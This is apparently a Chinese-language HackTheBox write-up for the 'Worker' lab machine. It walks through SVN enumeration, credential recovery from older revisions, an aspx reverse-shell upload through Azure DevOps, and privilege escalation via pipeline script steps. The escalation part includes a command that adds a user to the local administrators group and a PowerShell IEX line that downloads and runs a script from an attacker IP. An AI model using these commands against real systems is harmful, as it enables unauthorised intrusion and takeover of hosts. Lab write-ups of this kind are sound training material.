HackTheBox-Worker

靶机名：Worker
难度：中等？

0x01 信息收集

nmap

nmap -p 80,3690,5985 -sV --script=vuln worker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-17 08:21 UTC
Nmap scan report for worker.htb (10.129.50.115)
Host is up (0.23s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open  svnserve Subversion
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1056.00 seconds

svn

安装svn

1	sudo apt install subversion

将服务器的文件夹克隆到本地(直接就成功了,存在未授权漏洞)

1	svn checkout svn://10.129.2.29

获得一个文件夹，和一个txt文件。

版本是5

1	Checked out revision 5.

知道了目标的兩个子域名,并且得知库已经迁移之乐devops.worker.htb了

dimension.worker.htb
devops.worker.htb

查询

1	svn merge -r 5:3 svn://worker.htb

再回滚前面一点看看

1	svn merge -r 5:2 svn:worker.htb

用获得的账号密码访问devops

点进去项目后，有个源代码库。结合前面svn下的两个txt文件。猜测这个是新的项目库，加入到hosts看看

1	spectral.worker.htb

点击上传文件,上传一个aspx的反向shell.

要新建一个分支，再合并(因为没有权限直接上传到主分支..)。

手动点击下Approve。然后就可以合并了

收到了反弹的shell..看上去可以烂土豆?不过我测试用下载命令也下载不到东西.

查询svnserve服务配置信息，发现是有另外一个挂载盘的。

在其下面找到许多用户的passwd.

用获得的用户重新登陆下devpos，就会发现里面换了一个项目了。

默认的pool要删掉,否则run的时候会报错.

steps:
- script: echo This runs in the default shell on any machine
- bash: |
    echo This multiline script always runs in Bash.
    echo Even on Windows machines!
- pwsh: |
    Write-Host "This multiline script always runs in PowerShell Core."
    Write-Host "Even on non-Windows machines!"

通过阅读文档会发现 script处会执行系统上默认的shell程序,所以可以添加下面两句代码(其中一个)

net localgroup administrators robisl /add


powershell -c "Start-Process powershell {IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6:81/shell1.ps1')}"

用powerhsell反弹的方式虽然可以，但是不一会就会被控制台中断掉进程了，，不过时间也够看个root.txt或者给robisl用户加上个adminsitrators了

重新用evil-winrm重新登录一下.